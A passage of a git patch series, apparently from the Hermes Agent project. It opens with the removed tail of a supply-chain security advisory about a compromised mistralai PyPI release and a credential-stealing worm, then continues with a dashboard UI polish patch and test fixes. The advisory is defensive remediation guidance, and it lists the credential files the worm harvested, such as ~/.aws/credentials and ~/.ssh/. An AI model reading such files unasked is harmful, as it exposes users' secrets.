-compromised release — but we still recommend uninstalling, since the
-project is currently quarantined and we have disabled Mistral TTS / STT
-in Hermes regardless.
-
-You can also check manually:
-
-```bash
-pip show mistralai 2>/dev/null | grep -i version
-```
-
-## What we've done in Hermes Agent
-
-1. **Removed `mistral` from the `[all]` extra** so fresh installs no
-   longer pull the package by default. (PR #24205, already on main.)
-2. **Disabled the Mistral TTS and STT providers** in the runtime — they
-   return a "temporarily disabled" error and won't import the SDK even
-   if the venv still has it.
-3. **Added a security advisory checker** (`hermes doctor` and CLI startup
-   banner) that detects `mistralai 2.4.6` if it's still installed and
-   surfaces remediation steps. The banner is rate-limited (max once per
-   24h per advisory) and dismissible via `hermes doctor --ack`.
-4. **Hardened the installer fallback tiers.** When one extra's
-   dependency becomes unavailable on PyPI, the installer now degrades
-   gracefully — keeping every other extra — instead of dropping all the
-   way to a stripped install. Future supply-chain incidents won't
-   silently demote users.
-5. **Added a lazy-install framework** (`tools/lazy_deps.py`) so opt-in
-   backends (Mistral, ElevenLabs, Honcho, etc.) can be installed on
-   demand when the user enables them, rather than eagerly at install
-   time. This shrinks every fresh install's blast radius for future
-   single-package compromises.
-
-## What you should do
-
-If `hermes doctor` flags `mistralai==2.4.6`, treat the credentials in
-your environment as exposed:
-
-1. **Uninstall the compromised package:**
-   ```bash
-   pip uninstall -y mistralai
-   # or, if you installed via uv:
-   uv pip uninstall mistralai
-   ```
-
-2. **Rotate API keys.** Every key in `~/.hermes/.env` should be rotated:
-   OpenRouter, Anthropic, OpenAI, Nous, GitHub, AWS, Google, Mistral,
-   and any other provider tokens you have configured. If you used a
-   shell that exported keys (`.bashrc`, `.zshrc`, etc.), rotate those
-   too.
-
-3. **Audit credential files** for tokens that may have been read:
-   `~/.npmrc`, `~/.pypirc`, `~/.aws/credentials`, `~/.config/gh/hosts.yml`,
-   `~/.docker/config.json`, `~/.kube/config`, `~/.ssh/`. The worm
-   harvested files matching these patterns.
-
-4. **Check GitHub** for unexpected new SSH keys, deploy keys, or webhook
-   additions on repositories you have admin on. The worm uses stolen
-   GitHub tokens to add backdoors.
-
-5. **After cleanup**, dismiss the Hermes warning:
-   ```bash
-   hermes doctor --ack shai-hulud-2026-05
-   ```
-
-## When will Mistral TTS / STT come back?
-
-When PyPI restores the `mistralai` project to a clean release and we
-verify the new release on a clean network, we will re-enable Mistral
-TTS / STT in Hermes Agent. Until then, use Edge TTS (default, no key),
-ElevenLabs, OpenAI TTS, MiniMax TTS, or any of the user-defined command
-providers. For STT, use Groq Whisper or OpenAI Whisper.
-
-## Future hardening
-
-This incident exposed two structural weaknesses in our install path:
-
-- Eager-install of every optional extra meant ONE compromised package
-  could break the whole `[all]` resolve. **Fixed** via tiered fallback +
-  lazy-install framework.
-- Users had no way to know whether they had a poisoned dependency.
-  **Fixed** via `hermes_cli/security_advisories.py` and the
-  `hermes doctor` integration.
-
-We will continue to extend `tools/lazy_deps.py` so additional opt-in
-backends (Slack, Matrix, Bedrock, DingTalk, Feishu, Google Workspace,
-YouTube transcripts, etc.) can be installed on first use rather than
-eagerly. This reduces the blast radius of any future single-package
-compromise.
-
-## References
-
-- Socket Security report: <https://socket.dev/blog/mini-shai-hulud-worm-pypi>
-- PyPI quarantine: <https://pypi.org/simple/mistralai/>
-  (project-status: quarantined as of 2026-05-12)
-- Hermes Agent PR (mistral disabled): #24205
-- Hermes Agent PR (advisory checker + lazy installs): _this PR_
-- GitHub security advisory: _to be filed alongside this PR_
-
-## Credits
-
-Reported via [@SocketSecurity](https://twitter.com/SocketSecurity) and
-the broader supply-chain security community. Hermes Agent's response
-(detection, lazy-install framework, installer tier hardening) was built
-by the Hermes Agent team at Nous Research.

From fc3fd6bb6b3cb4aa01d71bb52c0092ec4b5db1b8 Mon Sep 17 00:00:00 2001
From: Austin Pickett <pickett.austin@gmail.com>
Date: Tue, 12 May 2026 13:42:14 -0400
Subject: [PATCH 11/59] =?UTF-8?q?fix(dashboard):=20UI=20polish=20=E2=80=94?=
 =?UTF-8?q?=20modals,=20layout,=20consistency,=20test=20fixes?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Dashboard UX polish pass — consolidates create forms into modals
triggered from the page header, fixes layout inconsistencies, adds
scroll-to navigation for the Keys page, and aligns the TokenBar with
the design system.

Changes:
- App.tsx: add padding to sidebar header
- resolve-page-title.ts: add missing routes, better fallback title
- en.ts: fix nav labels (Profiles was 'profiles : multi agents')
- ModelsPage: two-col layout, auxiliary tasks modal, TokenBar redesign
- ProfilesPage: create button in header, form in modal, Checkbox component
- CronPage: create button in header, form in modal
- EnvPage: scroll-to sub-nav in header, fix text overflow

Modal and dialog standardization:
- Replace all native confirm()/window.confirm() with ConfirmDialog
  (OAuthProvidersCard, PluginsPage, ModelsPage, ConfigPage)
- Add useModalBehavior hook (Escape-to-close, scroll lock, focus restore)
- Apply hook to ProfilesPage, CronPage, AuxiliaryTasksModal

Component fixes (from PR review):
- Checkbox: fix controlled/uncontrolled mismatch, add focus-visible ring
- TokenBar: add rounded-full to legend dots, remove dead code

CI/test fixes:
- Fix TS unused imports (noUnusedLocals), type-narrow PickerTarget union
- Add windows-footgun suppression on platform-guarded os.killpg
- Fix 19 stale unit tests + 9 e2e tests broken by recent main changes
- Restore minimal example-dashboard plugin for plugin auth test
---
 .../example-dashboard/dashboard/manifest.json |  14 +
 .../example-dashboard/dashboard/plugin_api.py |  17 +
 tests/agent/test_auxiliary_client.py          |   1 +
 tests/e2e/conftest.py                         |   3 +
 tests/gateway/test_config.py                  |   4 +-
 tests/gateway/test_tts_media_routing.py       |  18 +-
 tests/gateway/test_update_streaming.py        |   3 +
 tests/gateway/test_verbose_command.py         |  14 +-
 .../test_dashboard_profiles_nav_label.py      |   7 +-
 .../hermes_cli/test_update_gateway_restart.py |  27 +-
 .../run_agent/test_async_httpx_del_neuter.py  |   2 +-
 tests/run_agent/test_provider_parity.py       |   3 +-
 tests/test_ctx_halving_fix.py                 |   1 +
 tests/tools/test_vision_native_fast_path.py   |  10 +-
 tools/process_registry.py                     |   2 +-
 web/src/App.tsx                               |   2 +-
 web/src/components/OAuthProvidersCard.tsx     |  20 +-
 web/src/components/ui/checkbox.tsx            |  61 +++
 web/src/hooks/useModalBehavior.ts             |  44 +++
 web/src/i18n/en.ts                            |   2 +-
 web/src/lib/resolve-page-title.ts             |   7 +
 web/src/pages/ConfigPage.tsx                  |  28 +-
 web/src/pages/CronPage.tsx                    | 180 ++++++---
 web/src/pages/EnvPage.tsx                     |  78 +++-
 web/src/pages/ModelsPage.tsx                  | 370 ++++++++++++------
 web/src/pages/PluginsPage.tsx                 |  30 +-
 web/src/pages/ProfilesPage.tsx                | 135 +++++--
 27 files changed, 788 insertions(+), 295 deletions(-)
 create mode 100644 plugins/example-dashboard/dashboard/manifest.json
 create mode 100644 plugins/example-dashboard/dashboard/plugin_api.py
 create mode 100644 web/src/components/ui/checkbox.tsx
 create mode 100644 web/src/hooks/useModalBehavior.ts

diff --git a/plugins/example-dashboard/dashboard/manifest.json b/plugins/example-dashboard/dashboard/manifest.json
new file mode 100644
index 00000000000..68a2e9b895c
--- /dev/null
+++ b/plugins/example-dashboard/dashboard/manifest.json
@@ -0,0 +1,14 @@
+{
+  "name": "example",
+  "label": "Example",
+  "description": "Example dashboard plugin — used by test suite for auth coverage",
+  "icon": "Sparkles",
+  "version": "1.0.0",
+  "tab": {
+    "path": "/example",
+    "position": "after:skills"
+  },
+  "slots": [],
+  "entry": "dist/index.js",
+  "api": "plugin_api.py"
+}
diff --git a/plugins/example-dashboard/dashboard/plugin_api.py b/plugins/example-dashboard/dashboard/plugin_api.py
new file mode 100644
index 00000000000..3e850298a09
--- /dev/null
+++ b/plugins/example-dashboard/dashboard/plugin_api.py
@@ -0,0 +1,17 @@
+"""Example dashboard plugin — backend API routes.
+
+Mounted at /api/plugins/example/ by the dashboard plugin system.
+
+This minimal plugin exists so the test suite has a stable, side-effect-free
+GET endpoint to verify that plugin API routes work with auth.
+"""
+
+from fastapi import APIRouter
+
+router = APIRouter()
+
+
+@router.get("/hello")
+async def hello():
+    """Simple greeting endpoint to demonstrate plugin API routes."""
+    return {"message": "Hello from the example plugin!", "plugin": "example", "version": "1.0.0"}
diff --git a/tests/agent/test_auxiliary_client.py b/tests/agent/test_auxiliary_client.py
index cdac34d3282..c25ca219379 100644
--- a/tests/agent/test_auxiliary_client.py
+++ b/tests/agent/test_auxiliary_client.py
@@ -660,6 +660,7 @@ class TestAuxiliaryPoolAwareness:
         with (
             patch("agent.auxiliary_client.load_pool", return_value=_Pool()),
             patch("agent.auxiliary_client.OpenAI") as mock_openai,
+            patch("hermes_cli.models.get_nous_recommended_aux_model", return_value=None),
         ):
             from agent.auxiliary_client import _try_nous
 
diff --git a/tests/e2e/conftest.py b/tests/e2e/conftest.py
index 76b14e31793..332cccee497 100644
--- a/tests/e2e/conftest.py
+++ b/tests/e2e/conftest.py
@@ -222,6 +222,9 @@ def make_runner(platform: Platform, session_entry: SessionEntry = None) -> "Gate
     runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
     runner._emit_gateway_run_progress = AsyncMock()
 
+    # Disable destructive slash confirm gate so /new executes immediately
+    runner._read_user_config = lambda: {"approvals": {"destructive_slash_confirm": False}}
+
     runner.pairing_store = MagicMock()
     runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
     runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
diff --git a/tests/gateway/test_config.py b/tests/gateway/test_config.py
index c53e34b757e..c59b27d8001 100644
--- a/tests/gateway/test_config.py
+++ b/tests/gateway/test_config.py
@@ -176,8 +176,8 @@ class TestStreamingConfig:
                 "fresh_final_after_seconds": "oops",
             }
         )
-        assert restored.edit_interval == 1.0
-        assert restored.buffer_threshold == 40
+        assert restored.edit_interval == 0.8
+        assert restored.buffer_threshold == 24
         assert restored.fresh_final_after_seconds == 60.0
 
 
diff --git a/tests/gateway/test_tts_media_routing.py b/tests/gateway/test_tts_media_routing.py
index 0ef37deb3ee..ec93c33f75c 100644
--- a/tests/gateway/test_tts_media_routing.py
+++ b/tests/gateway/test_tts_media_routing.py
@@ -8,7 +8,7 @@ only renders as a voice bubble when explicitly flagged) and via
 """
 
 from types import SimpleNamespace
-from unittest.mock import AsyncMock
+from unittest.mock import AsyncMock, MagicMock
 
 import pytest
 
@@ -106,6 +106,16 @@ async def test_base_adapter_routes_voice_tagged_telegram_ogg_media_tag_to_voice_
     adapter.send_document.assert_not_awaited()
 
 
+def _fake_runner(thread_meta):
+    """Build a fake GatewayRunner-like object with the helper methods needed by
+    _deliver_media_from_response."""
+    runner = SimpleNamespace(
+        _thread_metadata_for_source=lambda source, anchor=None: thread_meta,
+        _reply_anchor_for_event=lambda event: None,
+    )
+    return runner
+
+
 @pytest.mark.asyncio
 async def test_streaming_delivery_routes_telegram_flac_media_tag_to_document_sender():
     event = _event(thread_id="topic-1")
@@ -121,7 +131,7 @@ async def test_streaming_delivery_routes_telegram_flac_media_tag_to_document_sen
     )
 
     await GatewayRunner._deliver_media_from_response(
-        object(),
+        _fake_runner({"thread_id": "topic-1"}),
         "MEDIA:/tmp/speech.flac",
         event,
         adapter,
@@ -150,7 +160,7 @@ async def test_streaming_delivery_routes_non_voice_telegram_ogg_media_tag_to_doc
     )
 
     await GatewayRunner._deliver_media_from_response(
-        object(),
+        _fake_runner({"thread_id": "topic-1"}),
         "MEDIA:/tmp/speech.ogg",
         event,
         adapter,
@@ -181,7 +191,7 @@ async def test_streaming_delivery_routes_telegram_mp3_media_tag_to_voice_sender(
     )
 
     await GatewayRunner._deliver_media_from_response(
-        object(),
+        _fake_runner({"thread_id": "topic-1"}),
         "MEDIA:/tmp/speech.mp3",
         event,
         adapter,
diff --git a/tests/gateway/test_update_streaming.py b/tests/gateway/test_update_streaming.py
index b1681e1f349..932bd1b0579 100644
--- a/tests/gateway/test_update_streaming.py
+++ b/tests/gateway/test_update_streaming.py
@@ -45,6 +45,9 @@ def _make_runner(hermes_home=None):
     runner._pending_messages = {}
     runner._pending_approvals = {}
     runner._failed_platforms = {}
+    # config is accessed by _check_slash_access and quick_commands lookup;
+    # None makes policy_for_source return a disabled (allow-all) policy.
+    runner.config = None
     # Bypass the destructive-slash confirm gate — this test exercises
     # update-prompt interception, not the confirm prompt.
     runner._read_user_config = lambda: {
diff --git a/tests/gateway/test_verbose_command.py b/tests/gateway/test_verbose_command.py
index d6debebae59..7b8d0445129 100644
--- a/tests/gateway/test_verbose_command.py
+++ b/tests/gateway/test_verbose_command.py
@@ -129,7 +129,7 @@ class TestVerboseCommand:
 
     @pytest.mark.asyncio
     async def test_defaults_to_all_when_no_tool_progress_set(self, tmp_path, monkeypatch):
-        """When tool_progress is not in config, defaults to 'all' then cycles to verbose."""
+        """When tool_progress is not in config, defaults to platform default then cycles."""
         hermes_home = tmp_path / "hermes"
         hermes_home.mkdir()
         config_path = hermes_home / "config.yaml"
@@ -143,17 +143,17 @@ class TestVerboseCommand:
         runner = _make_runner()
         result = await runner._handle_verbose_command(_make_event())
 
-        # Telegram default is "all" (high tier) → cycles to verbose
-        assert "VERBOSE" in result
+        # Telegram platform default is "new" → cycles to "all"
+        assert "ALL" in result
         saved = yaml.safe_load(config_path.read_text(encoding="utf-8"))
-        assert saved["display"]["platforms"]["telegram"]["tool_progress"] == "verbose"
+        assert saved["display"]["platforms"]["telegram"]["tool_progress"] == "all"
 
     @pytest.mark.asyncio
     async def test_per_platform_isolation(self, tmp_path, monkeypatch):
         """Cycling /verbose on Telegram doesn't change Slack's setting.
 
         Without a global tool_progress, each platform uses its built-in
-        default: Telegram = 'all' (high tier), Slack = 'off' (quiet Slack default).
+        default: Telegram = 'new' (overridden high tier), Slack = 'off' (quiet Slack default).
         """
         hermes_home = tmp_path / "hermes"
         hermes_home.mkdir()
@@ -178,8 +178,8 @@ class TestVerboseCommand:
 
         saved = yaml.safe_load(config_path.read_text(encoding="utf-8"))
         platforms = saved["display"]["platforms"]
-        # Telegram: all -> verbose (high tier default = all)
-        assert platforms["telegram"]["tool_progress"] == "verbose"
+        # Telegram: new -> all (platform default = new)
+        assert platforms["telegram"]["tool_progress"] == "all"
         # Slack: off -> new (first /verbose cycle from quiet default)
         assert platforms["slack"]["tool_progress"] == "new"
 
diff --git a/tests/hermes_cli/test_dashboard_profiles_nav_label.py b/tests/hermes_cli/test_dashboard_profiles_nav_label.py
index 583e62ee9fd..924f217bd2e 100644
--- a/tests/hermes_cli/test_dashboard_profiles_nav_label.py
+++ b/tests/hermes_cli/test_dashboard_profiles_nav_label.py
@@ -2,10 +2,11 @@
 from pathlib import Path
 
 
-def test_profiles_nav_label_uses_short_multi_agents_copy():
+def test_profiles_nav_label_uses_short_copy():
     en_i18n = Path(__file__).resolve().parents[2] / "web" / "src" / "i18n" / "en.ts"
 
     content = en_i18n.read_text(encoding="utf-8")
 
-    assert 'profiles: "profiles : multi agents"' in content
-    assert "Profiles: Running Multiple Agents" not in content
+    # Nav label should be the clean short form, not the old verbose string
+    assert 'profiles: "Profiles"' in content
+    assert "profiles : multi agents" not in content
diff --git a/tests/hermes_cli/test_update_gateway_restart.py b/tests/hermes_cli/test_update_gateway_restart.py
index 5493acb52c0..34c878eca79 100644
--- a/tests/hermes_cli/test_update_gateway_restart.py
+++ b/tests/hermes_cli/test_update_gateway_restart.py
@@ -6,6 +6,7 @@ rather than leaving zombie processes or telling users to manually restart
 when launchd will auto-respawn.
 """
 
+import os
 import subprocess
 from types import SimpleNamespace
 from unittest.mock import patch, MagicMock
@@ -1068,13 +1069,18 @@ class TestFindGatewayPidsExclude:
 
     def test_excludes_specified_pids(self, monkeypatch):
         monkeypatch.setattr(gateway_cli, "is_windows", lambda: False)
+        # Bypass /proc scan so the subprocess (ps) fallback is used
+        _real_isdir = os.path.isdir
+        monkeypatch.setattr("os.path.isdir", lambda p: False if p == "/proc" else _real_isdir(p))
+        monkeypatch.setattr(gateway_cli, "_get_service_pids", lambda: set())
+        monkeypatch.setattr(gateway_cli, "_get_ancestor_pids", lambda: {999})
 
         def fake_run(cmd, **kwargs):
             return subprocess.CompletedProcess(
                 cmd, 0,
                 stdout=(
-                    "user  100  0.0  0.0  0  0  ?  S  00:00  0:00  python gateway/run.py\n"
-                    "user  200  0.0  0.0  0  0  ?  S  00:00  0:00  python gateway/run.py\n"
+                    "100 python gateway/run.py\n"
+                    "200 python gateway/run.py\n"
                 ),
                 stderr="",
             )
@@ -1082,19 +1088,24 @@ class TestFindGatewayPidsExclude:
         monkeypatch.setattr(gateway_cli.subprocess, "run", fake_run)
         monkeypatch.setattr("os.getpid", lambda: 999)
 
-        pids = gateway_cli.find_gateway_pids(exclude_pids={100})
+        pids = gateway_cli.find_gateway_pids(exclude_pids={100}, all_profiles=True)
         assert 100 not in pids
         assert 200 in pids
 
     def test_no_exclude_returns_all(self, monkeypatch):
         monkeypatch.setattr(gateway_cli, "is_windows", lambda: False)
+        # Bypass /proc scan so the subprocess (ps) fallback is used
+        _real_isdir = os.path.isdir
+        monkeypatch.setattr("os.path.isdir", lambda p: False if p == "/proc" else _real_isdir(p))
+        monkeypatch.setattr(gateway_cli, "_get_service_pids", lambda: set())
+        monkeypatch.setattr(gateway_cli, "_get_ancestor_pids", lambda: {999})
 
         def fake_run(cmd, **kwargs):
             return subprocess.CompletedProcess(
                 cmd, 0,
                 stdout=(
-                    "user  100  0.0  0.0  0  0  ?  S  00:00  0:00  python gateway/run.py\n"
-                    "user  200  0.0  0.0  0  0  ?  S  00:00  0:00  python gateway/run.py\n"
+                    "100 python gateway/run.py\n"
+                    "200 python gateway/run.py\n"
                 ),
                 stderr="",
             )
@@ -1102,7 +1113,7 @@ class TestFindGatewayPidsExclude:
         monkeypatch.setattr(gateway_cli.subprocess, "run", fake_run)
         monkeypatch.setattr("os.getpid", lambda: 999)
 
-        pids = gateway_cli.find_gateway_pids()
+        pids = gateway_cli.find_gateway_pids(all_profiles=True)
         assert 100 in pids
         assert 200 in pids
 
@@ -1111,6 +1122,10 @@ class TestFindGatewayPidsExclude:
         profile_dir.mkdir(parents=True)
         monkeypatch.setattr(gateway_cli, "is_windows", lambda: False)
         monkeypatch.setattr(gateway_cli, "get_hermes_home", lambda: profile_dir)
+        # Bypass /proc scan so the subprocess (ps) fallback is used
+        _real_isdir = os.path.isdir
+        monkeypatch.setattr("os.path.isdir", lambda p: False if p == "/proc" else _real_isdir(p))
+        monkeypatch.setattr(gateway_cli, "_get_ancestor_pids", lambda: {999})
 
         def fake_run(cmd, **kwargs):
             return subprocess.CompletedProcess(
diff --git a/tests/run_agent/test_async_httpx_del_neuter.py b/tests/run_agent/test_async_httpx_del_neuter.py
index e616ea23acb..e91102288c0 100644
--- a/tests/run_agent/test_async_httpx_del_neuter.py
+++ b/tests/run_agent/test_async_httpx_del_neuter.py
@@ -182,7 +182,7 @@ class TestClientCacheBoundedGrowth:
             _get_cached_client,
         )
 
-        key = ("test_replace", True, "", "", "", (), False)
+        key = ("test_replace", True, "", "", "", (), False, "")
 
         # Simulate a stale entry from a closed loop
         old_loop = asyncio.new_event_loop()
diff --git a/tests/run_agent/test_provider_parity.py b/tests/run_agent/test_provider_parity.py
index 8eb7478b414..f97885a0382 100644
--- a/tests/run_agent/test_provider_parity.py
+++ b/tests/run_agent/test_provider_parity.py
@@ -945,7 +945,8 @@ class TestAuxiliaryClientProviderPriority:
         monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
         from agent.auxiliary_client import get_text_auxiliary_client
         with patch("agent.auxiliary_client._read_nous_auth", return_value={"access_token": "nous-tok"}), \
-             patch("agent.auxiliary_client.OpenAI") as mock:
+             patch("agent.auxiliary_client.OpenAI") as mock, \
+             patch("hermes_cli.models.get_nous_recommended_aux_model", return_value=None):
             client, model = get_text_auxiliary_client()
         assert model == "google/gemini-3-flash-preview"
 
diff --git a/tests/test_ctx_halving_fix.py b/tests/test_ctx_halving_fix.py
index 0dd3ca4e7eb..afeee84878c 100644
--- a/tests/test_ctx_halving_fix.py
+++ b/tests/test_ctx_halving_fix.py
@@ -169,6 +169,7 @@ class TestEphemeralMaxOutputTokens:
         agent.reasoning_config = None
         agent._is_anthropic_oauth = False
         agent._ephemeral_max_output_tokens = None
+        agent._use_long_lived_prefix_cache = False
 
         compressor = MagicMock()
         compressor.context_length = 200_000
diff --git a/tests/tools/test_vision_native_fast_path.py b/tests/tools/test_vision_native_fast_path.py
index fce3772de8e..1df3003e5cd 100644
--- a/tests/tools/test_vision_native_fast_path.py
+++ b/tests/tools/test_vision_native_fast_path.py
@@ -157,8 +157,14 @@ class TestHandleVisionAnalyzeFastPath:
         from agent.auxiliary_client import set_runtime_main, clear_runtime_main
         set_runtime_main("openrouter", "anthropic/claude-opus-4.6")
         try:
-            coro = _handle_vision_analyze({"image_url": str(img), "question": "?"})
-            result = asyncio.get_event_loop().run_until_complete(coro)
+            # Mock decide_image_input_mode to always return "native" so the
+            # fast path fires regardless of model-catalog state in CI.
+            with patch(
+                "agent.image_routing.decide_image_input_mode",
+                return_value="native",
+            ):
+                coro = _handle_vision_analyze({"image_url": str(img), "question": "?"})
+                result = asyncio.get_event_loop().run_until_complete(coro)
         finally:
             clear_runtime_main()
 
diff --git a/tools/process_registry.py b/tools/process_registry.py
index 8bbe1f56b7c..405abc04a3c 100644
--- a/tools/process_registry.py
+++ b/tools/process_registry.py
@@ -585,7 +585,7 @@ class ProcessRegistry:
             try:
                 if not _IS_WINDOWS:
                     try:
-                        os.killpg(os.getpgid(proc.pid), signal.SIGKILL)
+                        os.killpg(os.getpgid(proc.pid), signal.SIGKILL)  # windows-footgun: ok — guarded by _IS_WINDOWS check above
                     except (ProcessLookupError, PermissionError, OSError):
                         proc.kill()
                 else:
diff --git a/web/src/App.tsx b/web/src/App.tsx
index 7e1ca19f134..d7239c2ad11 100644
--- a/web/src/App.tsx
+++ b/web/src/App.tsx
@@ -473,7 +473,7 @@ export default function App() {
           >
             <div
               className={cn(
-                "flex h-14 shrink-0 items-center justify-between gap-2",
+                "flex h-14 shrink-0 items-center justify-between gap-2 px-4",
                 "border-b border-current/20",
               )}
             >
diff --git a/web/src/components/OAuthProvidersCard.tsx b/web/src/components/OAuthProvidersCard.tsx
index 6877207f8de..987f4c0eeef 100644
--- a/web/src/components/OAuthProvidersCard.tsx
+++ b/web/src/components/OAuthProvidersCard.tsx
@@ -20,6 +20,7 @@ import {
   CardTitle,
 } from "@/components/ui/card";
 import { Badge } from "@nous-research/ui/ui/components/badge";
+import { ConfirmDialog } from "@/components/ui/confirm-dialog";
 import { OAuthLoginModal } from "@/components/OAuthLoginModal";
 import { useI18n } from "@/i18n";
 
@@ -55,6 +56,8 @@ export function OAuthProvidersCard({ onError, onSuccess }: Props) {
   const [loading, setLoading] = useState(true);
   const [busyId, setBusyId] = useState<string | null>(null);
   const [loginFor, setLoginFor] = useState<OAuthProvider | null>(null);
+  const [disconnectTarget, setDisconnectTarget] =
+    useState<OAuthProvider | null>(null);
   const { t } = useI18n();
 
   const onErrorRef = useRef(onError);
@@ -74,10 +77,8 @@ export function OAuthProvidersCard({ onError, onSuccess }: Props) {
   }, [refresh]);
 
   const handleDisconnect = async (provider: OAuthProvider) => {
-    if (!confirm(`${t.oauth.disconnect} ${provider.name}?`)) {
-      return;
-    }
     setBusyId(provider.id);
+    setDisconnectTarget(null);
     try {
       await api.disconnectOAuthProvider(provider.id);
       onSuccess?.(`${provider.name} ${t.oauth.disconnect.toLowerCase()}ed`);
@@ -236,7 +237,7 @@ export function OAuthProvidersCard({ onError, onSuccess }: Props) {
                     <Button
                       size="sm"
                       outlined
-                      onClick={() => handleDisconnect(p)}
+                      onClick={() => setDisconnectTarget(p)}
                       disabled={isBusy}
                       prefix={isBusy ? <Spinner /> : <LogOut />}
                     >
@@ -266,6 +267,17 @@ export function OAuthProvidersCard({ onError, onSuccess }: Props) {
           onError={(msg) => onError?.(msg)}
         />
       )}
+      <ConfirmDialog
+        open={disconnectTarget !== null}
+        onCancel={() => setDisconnectTarget(null)}
+        onConfirm={() => {
+          if (disconnectTarget) void handleDisconnect(disconnectTarget);
+        }}
+        title={`${t.oauth.disconnect} ${disconnectTarget?.name ?? ""}?`}
+        description={`This will remove the stored OAuth tokens for ${disconnectTarget?.name ?? "this provider"}. You will need to re-authenticate to use it again.`}
+        destructive
+        confirmLabel={t.oauth.disconnect}
+      />
     </Card>
   );
 }
diff --git a/web/src/components/ui/checkbox.tsx b/web/src/components/ui/checkbox.tsx
new file mode 100644
index 00000000000..fa9f0098a00
--- /dev/null
+++ b/web/src/components/ui/checkbox.tsx
@@ -0,0 +1,61 @@
+import { cn } from "@/lib/utils";
+import { Check } from "lucide-react";
+
+interface CheckboxProps
+  extends Omit<React.InputHTMLAttributes<HTMLInputElement>, "type"> {
+  label?: React.ReactNode;
+}
+
+export function Checkbox({
+  className,
+  label,
+  id,
+  checked,
+  defaultChecked,
+  ...props
+}: CheckboxProps) {
+  // Support both controlled (checked prop) and uncontrolled (defaultChecked) usage.
+  // For visual rendering, prefer `checked` if provided; otherwise fall back to defaultChecked.
+  const isChecked = checked ?? defaultChecked ?? false;
+
+  return (
+    <label
+      htmlFor={id}
+      className={cn(
+        "group flex items-center gap-2.5 cursor-pointer select-none",
+        props.disabled && "cursor-not-allowed opacity-50",
+      )}
+    >
+      <span
+        className={cn(
+          "flex h-4 w-4 shrink-0 items-center justify-center transition-all",
+          "border bg-background/40",
+          // Focus-visible ring for keyboard accessibility
+          "group-has-[:focus-visible]:ring-2 group-has-[:focus-visible]:ring-ring group-has-[:focus-visible]:ring-offset-1",
+          isChecked
+            ? "border-foreground bg-foreground/20"
+            : "border-border group-hover:border-foreground/40",
+          className,
+        )}
+      >
+        <Check
+          className={cn(
+            "h-3 w-3 transition-opacity",
+            isChecked
+              ? "text-foreground opacity-100"
+              : "text-foreground opacity-0",
+          )}
+        />
+      </span>
+      <input
+        type="checkbox"
+        id={id}
+        checked={checked}
+        defaultChecked={checked === undefined ? defaultChecked : undefined}
+        className="sr-only"
+        {...props}
+      />
+      {label && <span className="text-sm">{label}</span>}
+    </label>
+  );
+}
diff --git a/web/src/hooks/useModalBehavior.ts b/web/src/hooks/useModalBehavior.ts
new file mode 100644
index 00000000000..648a396cea6
--- /dev/null
+++ b/web/src/hooks/useModalBehavior.ts
@@ -0,0 +1,44 @@
+import { useEffect, useRef } from "react";
+
+/**
+ * Hook that adds standard modal behaviors when `open` is true:
+ * - Escape key calls `onClose`
+ * - Body scroll is locked
+ * - Focus is restored to the previously focused element on close
+ *
+ * Returns a ref to attach to the modal container (for optional future focus trapping).
+ */
+export function useModalBehavior({
+  open,
+  onClose,
+}: {
+  open: boolean;
+  onClose: () => void;
+}) {
+  const containerRef = useRef<HTMLDivElement>(null);
+
+  useEffect(() => {
+    if (!open) return;
+
+    const prevActive = document.activeElement as HTMLElement | null;
+
+    const onKey = (e: KeyboardEvent) => {
+      if (e.key === "Escape") {
+        e.preventDefault();
+        onClose();
+      }
+    };
+
+    document.addEventListener("keydown", onKey);
+    const prevOverflow = document.body.style.overflow;
+    document.body.style.overflow = "hidden";
+
+    return () => {
+      document.removeEventListener("keydown", onKey);
+      document.body.style.overflow = prevOverflow;
+      prevActive?.focus?.();
+    };
+  }, [open, onClose]);
+
+  return containerRef;
+}
diff --git a/web/src/i18n/en.ts b/web/src/i18n/en.ts
index cec4dc2ff98..e93fdac7ec4 100644
--- a/web/src/i18n/en.ts
+++ b/web/src/i18n/en.ts
@@ -75,7 +75,7 @@ export const en: Translations = {
       keys: "Keys",
       logs: "Logs",
       models: "Models",
-      profiles: "profiles : multi agents",
+      profiles: "Profiles",
       plugins: "Plugins",
       sessions: "Sessions",
       skills: "Skills",
diff --git a/web/src/lib/resolve-page-title.ts b/web/src/lib/resolve-page-title.ts
index afa5ed5cd35..2b25e1a446e 100644
--- a/web/src/lib/resolve-page-title.ts
+++ b/web/src/lib/resolve-page-title.ts
@@ -4,10 +4,12 @@ const BUILTIN: Record<string, keyof Translations["app"]["nav"]> = {
   "/chat": "chat",
   "/sessions": "sessions",
   "/analytics": "analytics",
+  "/models": "models",
   "/logs": "logs",
   "/cron": "cron",
   "/skills": "skills",
   "/plugins": "plugins",
+  "/profiles": "profiles",
   "/config": "config",
   "/env": "keys",
   "/docs": "documentation",
@@ -30,5 +32,10 @@ export function resolvePageTitle(
   if (key) {
     return t.app.nav[key];
   }
+  // Derive title from pathname: "/profiles" → "Profiles"
+  const segment = normalized.slice(1);
+  if (segment) {
+    return segment.charAt(0).toUpperCase() + segment.slice(1);
+  }
   return t.app.webUi;
 }
diff --git a/web/src/pages/ConfigPage.tsx b/web/src/pages/ConfigPage.tsx
index 6fc510cc05f..66df9cd8f4d 100644
--- a/web/src/pages/ConfigPage.tsx
+++ b/web/src/pages/ConfigPage.tsx
@@ -46,6 +46,7 @@ import { Button } from "@nous-research/ui/ui/components/button";
 import { ListItem } from "@nous-research/ui/ui/components/list-item";
 import { Spinner } from "@nous-research/ui/ui/components/spinner";
 import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
+import { ConfirmDialog } from "@/components/ui/confirm-dialog";
 import { Input } from "@/components/ui/input";
 import { Badge } from "@nous-research/ui/ui/components/badge";
 import { useI18n } from "@/i18n";
@@ -118,6 +119,7 @@ export default function ConfigPage() {
   const [yamlLoading, setYamlLoading] = useState(false);
   const [yamlSaving, setYamlSaving] = useState(false);
   const [activeCategory, setActiveCategory] = useState<string>("");
+  const [confirmReset, setConfirmReset] = useState(false);
   const { toast, showToast } = useToast();
   const fileInputRef = useRef<HTMLInputElement>(null);
   const { t } = useI18n();
@@ -290,11 +292,17 @@ export default function ConfigPage() {
